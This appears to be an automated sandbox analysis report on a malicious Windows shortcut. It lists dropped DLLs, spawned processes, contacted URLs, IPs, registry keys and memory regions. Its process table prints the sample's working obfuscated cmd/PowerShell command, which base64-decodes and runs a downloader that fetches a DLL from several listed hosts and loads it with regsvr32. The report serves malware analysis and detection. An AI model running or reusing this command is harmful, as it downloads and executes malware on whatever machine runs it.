Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Details.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon
number=134, Archive, ctime=Fri Feb 4 06:07:07 2022, mtime=Thu May 19 18:45:55 2022, atime=Fri Feb 4 06:07:07 2022, length=289792,
window=hidenormalshowminimized
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Windows\System32\PZgVlkJBEGfsjmei\fJMgQrGs.dll (copy)
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x44de5033, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ee31ggyj.rpi.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_txiyar5n.dg2.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\Documents\20220523\PowerShell_transcript.715575.UCoOWmwG.20220523095425.txt
|
UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\System32\cmd.exe" /v:on /c M6+PYc1Ovpprw628Rl1zIwgCkVUha+nmywj5pKbvwUCOuX5GbnEfV3pSZPoT4QlmtbO4K6aL||p^o^w^e^r^s^h^e^l^l.e^x^e
-c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI);
iex ($TcqkRL)}
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI);
iex ($TcqkRL)}"
|
|
|
|
C:\Windows\System32\regsvr32.exe
|
"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP
|
|
|
|
C:\Windows\System32\regsvr32.exe
|
C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PZgVlkJBEGfsjmei\fJMgQrGs.dll"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p
|
There are 1 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://digitalkitchen.jp/images/PVn/
|
unknown
|
|
|
|
http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/
|
unknown
|
|
|
|
http://piffl.com/piffl.com/a/ity.
|
unknown
|
|
|
|
http://www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/
|
98.142.105.106
|
|
|
|
https://173.82.82.196:8080/
|
unknown
|
|
|
|
http://piffl.com/piffl.com/a/
|
unknown
|
|
|
|
https://173.82.82.196/6
|
unknown
|
|
|
|
https://nakharinitwebhosting.com/HSDYKN1X5GLF/
|
unknown
|
|
|
|
https://173.82.82.196/~
|
unknown
|
|
|
|
https://www.disneyplus.com/legal/your-california-privacy-rights
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enu
|
unknown
|
||
|
http://schemas.mic
|
unknown
|
||
|
http://www.jsonsintl.com/
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://go.microsoft.co
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://www.tiktok.com/legal/report/feedback
|
unknown
|
||
|
http://jsonsintl.com
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://support.hotspotshield.com/
|
unknown
|
||
|
https://www.disneyplus.com/legal/privacy-policy
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2004/09/enumeration
|
unknown
|
||
|
http://www.jsonsintl.com
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://www.hotspotshield.com/terms/
|
unknown
|
||
|
https://www.pango.co/privacy
|
unknown
|
||
|
https://disneyplus.com/legal.
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://cmentarz.5v.pl/themes/zalMkTb/
|
unknown
|
||
|
http://help.disneyplus.com.
|
unknown
|
||
|
http://www.jsonsintl.comx
|
unknown
|
There are 27 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
www.jsonsintl.com
|
unknown
|
|
|
|
jsonsintl.com
|
98.142.105.106
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
173.82.82.196
|
unknown
|
United States
|
|
|
|
192.168.2.1
|
unknown
|
unknown
|
||
|
98.142.105.106
|
jsonsintl.com
|
United States
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
|
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f0\52C64B7E
|
@%SystemRoot%\System32\ci.dll,-100
|
||
|
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f0\52C64B7E
|
@%SystemRoot%\System32\ci.dll,-101
|
||
|
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f0\52C64B7E
|
@%SystemRoot%\system32\dnsapi.dll,-103
|
||
|
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f0\52C64B7E
|
@%SystemRoot%\System32\fveui.dll,-843
|
||
|
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f0\52C64B7E
|
@%SystemRoot%\System32\fveui.dll,-844
|
||
|
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f0\52C64B7E
|
@%SystemRoot%\System32\wuaueng.dll,-400
|
||
|
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f0\52C64B7E
|
@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124
|
||
|
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f0\52C64B7E
|
@%SystemRoot%\system32\NgcRecovery.dll,-100
|
There are 13 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
180001000
|
direct allocation
|
page execute read
|
|
|
|
180001000
|
direct allocation
|
page execute read
|
|
|
|
AD0000
|
direct allocation
|
page execute and read and write
|
|
|
|
2330000
|
direct allocation
|
page execute and read and write
|
|
|
|
24B5D24C000
|
heap
|
page read and write
|
||
|
11E73820000
|
trusted library allocation
|
page read and write
|
||
|
24B5D28A000
|
heap
|
page read and write
|
||
|
24B5D130000
|
heap
|
page read and write
|
||
|
209C6300000
|
heap
|
page read and write
|
||
|
16502102000
|
heap
|
page read and write
|
||
|
24B5DD67000
|
heap
|
page read and write
|
||
|
24B5D2A2000
|
heap
|
page read and write
|
||
|
21B767D0000
|
heap
|
page read and write
|
||
|
21B76561000
|
trusted library allocation
|
page read and write
|
||
|
21B767CD000
|
heap
|
page read and write
|
||
|
18002E000
|
direct allocation
|
page readonly
|
||
|
11E739C7000
|
heap
|
page read and write
|
||
|
24B5DDA6000
|
heap
|
page read and write
|
||
|
11183400000
|
trusted library section
|
page readonly
|
||
|
209C6213000
|
heap
|
page read and write
|
||
|
24B5D2EF000
|
heap
|
page read and write
|
||
|
CEAA78000
|
stack
|
page read and write
|
||
|
21B76452000
|
heap
|
page read and write
|
||
|
21B5F2EC000
|
trusted library allocation
|
page read and write
|
||
|
24B5DD94000
|
heap
|
page read and write
|
||
|
7FF9F1A66000
|
trusted library allocation
|
page read and write
|
||
|
24B5DD71000
|
heap
|
page read and write
|
||
|
24B5D24B000
|
heap
|
page read and write
|
||
|
21B76720000
|
trusted library allocation
|
page read and write
|
||
|
24B5D2F9000
|
heap
|
page read and write
|
||
|
11187C4C000
|
heap
|
page read and write
|
||
|
299B000
|
stack
|
page read and write
|
||
|
985000
|
heap
|
page read and write
|
||
|
21B76580000
|
trusted library allocation
|
page read and write
|
||
|
21B5F25D000
|
trusted library allocation
|
page read and write
|
||
|
24B5DD74000
|
heap
|
page read and write
|
||
|
11E73987000
|
heap
|
page read and write
|
||
|
72BE7F7000
|
stack
|
page read and write
|
||
|
209C5FD0000
|
heap
|
page read and write
|
||
|
111877B0000
|
trusted library allocation
|
page read and write
|
||
|
1650208A000
|
heap
|
page read and write
|
||
|
2592EF25000
|
heap
|
page read and write
|
||
|
860830B000
|
stack
|
page read and write
|
||
|
2592EDF0000
|
heap
|
page read and write
|
||
|
AF2C978000
|
stack
|
page read and write
|
||
|
1FD1F39D000
|
heap
|
page read and write
|
||
|
24B5DD71000
|
heap
|
page read and write
|
||
|
A24000
|
heap
|
page read and write
|
||
|
24B5DD8D000
|
heap
|
page read and write
|
||
|
21B5F4D3000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1A6C000
|
trusted library allocation
|
page execute and read and write
|
||
|
16501E80000
|
heap
|
page read and write
|
||
|
24B5DD91000
|
heap
|
page read and write
|
||
|
21B763F0000
|
heap
|
page read and write
|
||
|
1FD1F371000
|
heap
|
page read and write
|
||
|
21B765A0000
|
heap
|
page execute and read and write
|
||
|
21B5F038000
|
trusted library allocation
|
page read and write
|
||
|
209C628C000
|
heap
|
page read and write
|
||
|
20298F02000
|
heap
|
page read and write
|
||
|
298B000
|
stack
|
page read and write
|
||
|
860887B000
|
stack
|
page read and write
|
||
|
209C6308000
|
heap
|
page read and write
|
||
|
20298BD0000
|
heap
|
page read and write
|
||
|
B00000
|
heap
|
page readonly
|
||
|
21B76540000
|
trusted library allocation
|
page read and write
|
||
|
9C0000
|
heap
|
page read and write
|
||
|
7FF9F1D40000
|
trusted library allocation
|
page read and write
|
||
|
24B5DD91000
|
heap
|
page read and write
|
||
|
21B76550000
|
trusted library allocation
|
page read and write
|
||
|
21B766C0000
|
trusted library allocation
|
page read and write
|
||
|
20298D30000
|
trusted library allocation
|
page read and write
|
||
|
2592EE28000
|
heap
|
page read and write
|
||
|
209C6250000
|
heap
|
page read and write
|
||
|
24B5DD9E000
|
heap
|
page read and write
|
||
|
CEAB7A000
|
stack
|
page read and write
|
||
|
24B5E21A000
|
heap
|
page read and write
|
||
|
24B5DDB0000
|
heap
|
page read and write
|
||
|
21B5E45A000
|
trusted library allocation
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
11E739E2000
|
heap
|
page read and write
|
||
|
AF2C77F000
|
stack
|
page read and write
|
||
|
21B766B0000
|
trusted library allocation
|
page read and write
|
||
|
209C624B000
|
heap
|
page read and write
|
||
|
24B5DD80000
|
heap
|
page read and write
|
||
|
21B5F22A000
|
trusted library allocation
|
page read and write
|
||
|
21B76960000
|
trusted library allocation
|
page read and write
|
||
|
21B76530000
|
trusted library allocation
|
page read and write
|
||
|
24B5DDB4000
|
heap
|
page read and write
|
||
|
7FF9F1A96000
|
trusted library allocation
|
page execute and read and write
|
||
|
CEB1FF000
|
stack
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
21B766F0000
|
trusted library allocation
|
page read and write
|
||
|
1FD1F3A8000
|
heap
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
21B76560000
|
trusted library allocation
|
page read and write
|
||
|
21B76530000
|
trusted library allocation
|
page read and write
|
||
|
11182C00000
|
heap
|
page read and write
|
||
|
7FF9F1BE9000
|
trusted library allocation
|
page read and write
|
||
|
16502113000
|
heap
|
page read and write
|
||
|
209C6255000
|
heap
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
24B5DD93000
|
heap
|
page read and write
|
||
|
20298E89000
|
heap
|
page read and write
|
||
|
24B5E218000
|
heap
|
page read and write
|
||
|
11182D59000
|
heap
|
page read and write
|
||
|
24B5DDA2000
|
heap
|
page read and write
|
||
|
16501FE0000
|
trusted library allocation
|
page read and write
|
||
|
A33000
|
heap
|
page read and write
|
||
|
1FD1F387000
|
heap
|
page read and write
|
||
|
20298BC0000
|
heap
|
page read and write
|
||
|
2592EE13000
|
heap
|
page read and write
|
||
|
860838F000
|
stack
|
page read and write
|
||
|
11E73B90000
|
trusted library allocation
|
page read and write
|
||
|
72BE4FE000
|
stack
|
page read and write
|
||
|
24B5D308000
|
heap
|
page read and write
|
||
|
21B764D7000
|
heap
|
page read and write
|
||
|
CEAC7A000
|
stack
|
page read and write
|
||
|
209C6282000
|
heap
|
page read and write
|
||
|
7FFA51CA0000
|
unkown
|
page readonly
|
||
|
7FF9F1C10000
|
trusted library allocation
|
page read and write
|
||
|
24B5DD6D000
|
heap
|
page read and write
|
||
|
209C6313000
|
heap
|
page read and write
|
||
|
209C6270000
|
heap
|
page read and write
|
||
|
21B76980000
|
trusted library allocation
|
page read and write
|
||
|
11182E01000
|
trusted library allocation
|
page read and write
|
||
|
11E746C0000
|
trusted library allocation
|
page read and write
|
||
|
11182313000
|
heap
|
page read and write
|
||
|
20298E7E000
|
heap
|
page read and write
|
||
|
21B5C430000
|
heap
|
page read and write
|
||
|
989000
|
heap
|
page read and write
|
||
|
AF2C27F000
|
stack
|
page read and write
|
||
|
2B90000
|
heap
|
page read and write
|
||
|
20298E60000
|
heap
|
page read and write
|
||
|
21B5F222000
|
trusted library allocation
|
page read and write
|
||
|
AF2C47E000
|
stack
|
page read and write
|
||
|
24B5DD95000
|
heap
|
page read and write
|
||
|
21B76560000
|
trusted library allocation
|
page read and write
|
||
|
209C6252000
|
heap
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
21B76783000
|
heap
|
page read and write
|
||
|
CEA87B000
|
stack
|
page read and write
|
||
|
20298E6A000
|
heap
|
page read and write
|
||
|
6302CFE000
|
stack
|
page read and write
|
||
|
11187C21000
|
heap
|
page read and write
|
||
|
11E74920000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1A60000
|
trusted library allocation
|
page read and write
|
||
|
20298F08000
|
heap
|
page read and write
|
||
|
24B5DD8D000
|
heap
|
page read and write
|
||
|
7FFA51CA1000
|
unkown
|
page execute read
|
||
|
21B76580000
|
trusted library allocation
|
page read and write
|
||
|
27A0000
|
trusted library allocation
|
page read and write
|
||
|
6302DFD000
|
stack
|
page read and write
|
||
|
11187CA3000
|
heap
|
page read and write
|
||
|
22E0000
|
heap
|
page read and write
|
||
|
AF2C2FF000
|
stack
|
page read and write
|
||
|
21B5F0C2000
|
trusted library allocation
|
page read and write
|
||
|
1FD1F39D000
|
heap
|
page read and write
|
||
|
24B5DD96000
|
heap
|
page read and write
|
||
|
D003B0F000
|
stack
|
page read and write
|
||
|
21B7699E000
|
trusted library allocation
|
page read and write
|
||
|
11187C3F000
|
heap
|
page read and write
|
||
|
21B76530000
|
trusted library allocation
|
page read and write
|
||
|
987000
|
heap
|
page read and write
|
||
|
24B5DD8D000
|
heap
|
page read and write
|
||
|
24B5DD6F000
|
heap
|
page read and write
|
||
|
21B5F089000
|
trusted library allocation
|
page read and write
|
||
|
2300000
|
heap
|
page readonly
|
||
|
6302BFE000
|
stack
|
page read and write
|
||
|
11182287000
|
heap
|
page read and write
|
||
|
11182C15000
|
heap
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
24B5DDAF000
|
heap
|
page read and write
|
||
|
AC6000
|
heap
|
page read and write
|
||
|
21B5C4D0000
|
heap
|
page read and write
|
||
|
209C624D000
|
heap
|
page read and write
|
||
|
7FF9F1B52000
|
trusted library allocation
|
page read and write
|
||
|
11182130000
|
heap
|
page read and write
|
||
|
7FF9F1A70000
|
trusted library allocation
|
page execute and read and write
|
||
|
24B5DD85000
|
heap
|
page read and write
|
||
|
21B76590000
|
trusted library allocation
|
page read and write
|
||
|
24B5D0C0000
|
heap
|
page read and write
|
||
|
7FF9F1C80000
|
trusted library allocation
|
page read and write
|
||
|
2592ED80000
|
heap
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
24B5DD91000
|
heap
|
page read and write
|
||
|
21B76970000
|
trusted library allocation
|
page read and write
|
||
|
11187CFD000
|
heap
|
page read and write
|
||
|
11187970000
|
trusted library allocation
|
page read and write
|
||
|
11187AA0000
|
remote allocation
|
page read and write
|
||
|
21B5EFFD000
|
trusted library allocation
|
page read and write
|
||
|
24B5DD6B000
|
heap
|
page read and write
|
||
|
180000000
|
direct allocation
|
page read and write
|
||
|
11187A80000
|
trusted library allocation
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
11E73BC0000
|
heap
|
page read and write
|
||
|
111833D0000
|
trusted library section
|
page readonly
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
24B5DD90000
|
heap
|
page read and write
|
||
|
962000
|
heap
|
page read and write
|
||
|
21B76560000
|
trusted library allocation
|
page read and write
|
||
|
AF2C677000
|
stack
|
page read and write
|
||
|
590000
|
heap
|
page read and write
|
||
|
21B766D0000
|
trusted library allocation
|
page read and write
|
||
|
180000000
|
direct allocation
|
page read and write
|
||
|
21B76560000
|
trusted library allocation
|
page read and write
|
||
|
D002875000
|
stack
|
page read and write
|
||
|
11187C61000
|
heap
|
page read and write
|
||
|
20298E5C000
|
heap
|
page read and write
|
||
|
11E73BC5000
|
heap
|
page read and write
|
||
|
24B5DD63000
|
heap
|
page read and write
|
||
|
21B5C55D000
|
heap
|
page read and write
|
||
|
21B5C5C0000
|
heap
|
page read and write
|
||
|
2592EE6B000
|
heap
|
page read and write
|
||
|
21B76560000
|
trusted library allocation
|
page read and write
|
||
|
21B5F4F6000
|
trusted library allocation
|
page read and write
|
||
|
9E0000
|
heap
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1D10000
|
trusted library allocation
|
page read and write
|
||
|
11187A70000
|
trusted library allocation
|
page read and write
|
||
|
21B76550000
|
trusted library allocation
|
page read and write
|
||
|
72BE8FF000
|
stack
|
page read and write
|
||
|
209C6257000
|
heap
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
209C627B000
|
heap
|
page read and write
|
||
|
21B7649D000
|
heap
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
AF2C3FC000
|
stack
|
page read and write
|
||
|
24B5DD9E000
|
heap
|
page read and write
|
||
|
2592EE00000
|
heap
|
page read and write
|
||
|
21B5C4C0000
|
trusted library allocation
|
page read and write
|
||
|
7DF4AD4A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
CEAF7E000
|
stack
|
page read and write
|
||
|
21B76580000
|
trusted library allocation
|
page read and write
|
||
|
24B5DD6D000
|
heap
|
page read and write
|
||
|
11187A50000
|
trusted library allocation
|
page read and write
|
||
|
8608A7B000
|
stack
|
page read and write
|
||
|
7FFA51CA1000
|
unkown
|
page execute read
|
||
|
21B5F4EE000
|
trusted library allocation
|
page read and write
|
||
|
2592EE3C000
|
heap
|
page read and write
|
||
|
21B76560000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F19B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF9F1CA0000
|
trusted library allocation
|
page read and write
|
||
|
2592EF13000
|
heap
|
page read and write
|
||
|
7FF9F19C3000
|
trusted library allocation
|
page read and write
|
||
|
24B5DA90000
|
remote allocation
|
page read and write
|
||
|
7FF9F1C47000
|
trusted library allocation
|
page read and write
|
||
|
21B76560000
|
trusted library allocation
|
page read and write
|
||
|
20298E66000
|
heap
|
page read and write
|
||
|
1FD1F3A6000
|
heap
|
page read and write
|
||
|
A4E000
|
heap
|
page read and write
|
||
|
21B5E3E0000
|
heap
|
page execute and read and write
|
||
|
209C6302000
|
heap
|
page read and write
|
||
|
D003C8E000
|
stack
|
page read and write
|
||
|
11183771000
|
trusted library allocation
|
page read and write
|
||
|
11182D02000
|
heap
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
11183420000
|
trusted library section
|
page readonly
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
21B76580000
|
trusted library allocation
|
page read and write
|
||
|
24B5E202000
|
heap
|
page read and write
|
||
|
CEAD7E000
|
stack
|
page read and write
|
||
|
11E73B50000
|
trusted library allocation
|
page read and write
|
||
|
8A0000
|
heap
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
11182D18000
|
heap
|
page read and write
|
||
|
21B766B0000
|
trusted library allocation
|
page read and write
|
||
|
24B5D200000
|
heap
|
page read and write
|
||
|
24B5DDA6000
|
heap
|
page read and write
|
||
|
D002C79000
|
stack
|
page read and write
|
||
|
6302B77000
|
stack
|
page read and write
|
||
|
11187AA0000
|
trusted library allocation
|
page read and write
|
||
|
21B76580000
|
trusted library allocation
|
page read and write
|
||
|
11187C2D000
|
heap
|
page read and write
|
||
|
7FF9F1CD0000
|
trusted library allocation
|
page read and write
|
||
|
21B764A5000
|
heap
|
page read and write
|
||
|
11182D00000
|
heap
|
page read and write
|
||
|
21B5F0AF000
|
trusted library allocation
|
page read and write
|
||
|
F4547E000
|
stack
|
page read and write
|
||
|
11187961000
|
trusted library allocation
|
page read and write
|
||
|
24B5DDB0000
|
heap
|
page read and write
|
||
|
D003D0C000
|
stack
|
page read and write
|
||
|
21B76590000
|
trusted library allocation
|
page read and write
|
||
|
111832F0000
|
trusted library allocation
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
21B76580000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F19B4000
|
trusted library allocation
|
page read and write
|
||
|
24B5DD78000
|
heap
|
page read and write
|
||
|
CEB17C000
|
stack
|
page read and write
|
||
|
21B7659C000
|
trusted library allocation
|
page read and write
|
||
|
1650205F000
|
heap
|
page read and write
|
||
|
955000
|
heap
|
page read and write
|
||
|
24B5E221000
|
heap
|
page read and write
|
||
|
21B764D7000
|
heap
|
page read and write
|
||
|
21B76579000
|
trusted library allocation
|
page read and write
|
||
|
24B5D0D0000
|
heap
|
page read and write
|
||
|
11E73BD0000
|
trusted library allocation
|
page read and write
|
||
|
1FD1F260000
|
heap
|
page read and write
|
||
|
21B5F586000
|
trusted library allocation
|
page read and write
|
||
|
24B5DD95000
|
heap
|
page read and write
|
||
|
AAB000
|
heap
|
page read and write
|
||
|
1FD1F382000
|
heap
|
page read and write
|
||
|
24B5D2DD000
|
heap
|
page read and write
|
||
|
11182326000
|
heap
|
page read and write
|
||
|
24B5DD91000
|
heap
|
page read and write
|
||
|
11182257000
|
heap
|
page read and write
|
||
|
281E000
|
stack
|
page read and write
|
||
|
7FF9F1B80000
|
trusted library allocation
|
page execute and read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
21B767C4000
|
heap
|
page read and write
|
||
|
936000
|
heap
|
page read and write
|
||
|
21B5C59F000
|
heap
|
page read and write
|
||
|
11E739CF000
|
heap
|
page read and write
|
||
|
7FF9F1CF0000
|
trusted library allocation
|
page read and write
|
||
|
D002AFE000
|
stack
|
page read and write
|
||
|
11187960000
|
trusted library allocation
|
page read and write
|
||
|
209C6A02000
|
trusted library allocation
|
page read and write
|
||
|
111821A0000
|
heap
|
page read and write
|
||
|
21B76990000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1D30000
|
trusted library allocation
|
page read and write
|
||
|
21B5F0B3000
|
trusted library allocation
|
page read and write
|
||
|
D002BFE000
|
stack
|
page read and write
|
||
|
7FFA51CC2000
|
unkown
|
page readonly
|
||
|
24B5DD91000
